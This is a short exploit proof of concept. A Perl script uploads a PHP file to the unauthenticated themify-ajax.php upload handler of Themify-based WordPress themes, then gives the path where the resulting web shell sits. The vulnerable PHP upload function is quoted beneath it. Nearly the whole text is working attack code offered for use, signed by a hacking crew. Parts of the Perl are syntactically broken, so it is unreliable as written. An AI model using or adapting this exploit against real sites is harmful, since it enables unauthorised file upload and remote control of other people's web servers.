#!/usr/bin/perl
use LWP::Simple;
use LWP 5.64;
use LWP::UserAgent;
my $url = "http://".$site."wp-content/themes/".$theme."/themify/themify-ajax.php?upload=1" my $upspread = "wp_protect.php";
my $ua = LWP::UserAgent->new;
$ua->timeout(20);
my @parameters = ( Filedata => [ $upspread ]);
my $req = POST($url, Content_Type => 'form-data',
Content => \@parameters );
my $res = $ua->request($req);
shell http://".$site."wp-content/themes/".$theme."/uploads/thumb_editor.php
prof of concept:
code not properly sanitized at get function:
function themify_upload(){
if(!empty($_FILES)) {
if(!isset($_POST['target']) || $_POST['target'] == ''){
$target = TEMPLATEPATH.'/uploads/';
} else {
$target = TEMPLATEPATH.'/'.$_POST['target'];
}
$target = rtrim($target, "/");
$check = false;
if(!is_dir($target)){
if(!mkdir($target, 0777, true)){
echo "false";
} else {
$check = true;
}
} else {
$check = true;
}
if($check){
if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $target."/".str_replace(" ", "-", basename($_FILES['Filedata']['name'])))){
echo str_replace(" ", "-", basename($_FILES['Filedata']['name']));
} else {
echo "false";
}
}
}
}
if($_GET['upload']){
themify_upload();
}
example
shell
dark crew friends italians discovers
